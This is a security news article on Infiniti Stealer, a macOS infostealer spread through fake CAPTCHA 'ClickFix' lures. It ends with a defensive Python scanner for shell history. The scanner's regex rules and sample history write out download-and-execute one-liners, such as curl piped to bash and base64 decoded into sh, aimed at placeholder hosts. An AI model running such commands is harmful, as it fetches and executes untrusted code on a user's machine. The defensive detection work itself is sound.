A new and sophisticated threat is targeting macOS users, particularly those in the crypto and developer communities. Attackers are deploying a novel information stealer, dubbed Infiniti Stealer, by tricking victims with fake Cloudflare CAPTCHA pages into executing malicious commands. This malware is specifically designed to pilfer sensitive cryptocurrency wallet data and other critical credentials from Mac systems.
Security researchers at Malwarebytes uncovered this campaign, identifying the new infostealer as Infiniti Stealer. The malware is delivered through a “ClickFix” social engineering attack, a technique commonly seen on Windows but now adapted for macOS environments. Because the method convinces users to run the harmful commands themselves, the attackers do not need a traditional software exploit.
The attack initiates with a deceptive CAPTCHA page, often resembling Cloudflare’s human verification, hosted on domains like update-check[.]com. After clicking the fake verification, users are instructed to open Terminal and paste a seemingly innocuous command. This command, however, is a hidden installer script that silently downloads and deploys Infiniti Stealer onto the Mac.
Once executed, the malware connects to a remote server to install itself without any user alerts or pop-ups. Infiniti Stealer is compiled into a native macOS binary using Nuitka, making it particularly challenging to analyze and detect. The infostealer is engineered to steal a wide array of data, including cryptocurrency wallet information, credentials from web browsers and the macOS Keychain, plaintext secrets from developer files, and even screenshots taken during its operation. It also incorporates anti-analysis checks to evade detection, sending stolen data to the attacker’s server with Telegram notifications upon completion.
The emergence of Infiniti Stealer highlights a growing trend of malware targeting macOS systems. Previously, in March 2026, security researchers noted the GhostClaw malware, which also aimed at macOS users to steal private keys and sensitive wallet data via malicious npm packages.
The threat to personal crypto holdings is escalating significantly. According to blockchain intelligence firm Chainalysis, cryptocurrency theft reached over $3.4 billion in 2025. Personal wallet compromises have grown substantially, accounting for 44% of the total stolen value in 2024, up from just 7.3% in 2022. This indicates a critical shift towards targeting individual users.
As cybercriminals increasingly adapt sophisticated attack vectors like ClickFix for Apple machines, macOS systems are no longer immune to advanced malware. Therefore, crypto users and developers must exercise extreme caution when browsing the web. Never paste commands into Terminal from untrusted or unverified sources, as this remains a primary vector for self-initiated infections.
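For defenders checking whether such a command was already pasted into Terminal, the sketch below scans zsh history text for download-and-execute one-liners. It is an added example, not code from Malwarebytes or from the campaign; the rule names, regexes and sample history are constructed assumptions, not published Infiniti Stealer indicators.

```python
import re

# Heuristic rules for download-and-execute one-liners of the kind ClickFix lures
# ask users to paste. Assumed patterns, not published Infiniti Stealer indicators.
FETCH = r"(?:curl|wget)\b[^|;&]*"
SHELL = r"(?:(?:ba|z|da)?sh|osascript|python3?)\b"
RULES = {
    "fetch-pipe-shell": re.compile(rf"{FETCH}\|\s*(?:sudo\s+)?{SHELL}"),
    "shell-runs-fetch": re.compile(
        rf"{SHELL}\s+(?:-c\s+)?[\"']?(?:\$\(|<\(|`)\s*{FETCH}"),
    "base64-pipe-shell": re.compile(
        rf"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*{SHELL}"),
}
ZSH_EXT = re.compile(r"^: \d+:\d+;")  # zsh EXTENDED_HISTORY prefix ": <epoch>:<secs>;"

def entries(text):
    """Yield (start_line, command), joining backslash-continued history lines."""
    buf, start = "", 0
    for n, raw in enumerate(text.splitlines(), 1):
        if not buf:
            start, raw = n, ZSH_EXT.sub("", raw)
        if raw.endswith("\\"):
            buf += raw[:-1] + " "
            continue
        yield start, (buf + raw).strip()
        buf = ""
    if buf:  # history ended in the middle of a continued command
        yield start, buf.strip()

def scan_history(text):
    """Return (line_number, rule_name, command) for each suspicious entry."""
    hits = []
    for n, cmd in entries(text):
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.append((n, name, cmd))
                break  # one rule per entry is enough to flag it
    return hits

# Constructed sample history; hosts and timestamps are placeholders.
SAMPLE = """\
: 1767000001:0;brew install jq
: 1767000050:0;curl -fsSL https://cdn.example.invalid/verify.sh | bash
: 1767000090:0;/bin/bash -c "$(curl -fsSL https://example.invalid/i)"
: 1767000120:0;echo QUJD | base64 -D | sh
: 1767000150:0;curl -O https://example.invalid/file.tar.gz
: 1767000200:0;curl -s https://example.invalid/a \\
  | zsh
"""

if __name__ == "__main__":
    for hit in scan_history(SAMPLE):
        print(hit)
```

To use it on a real machine, pass the contents of `~/.zsh_history` (read with `errors="replace"`) to `scan_history`. Hits are leads for review rather than verdicts, since some legitimate installers use the same command shape.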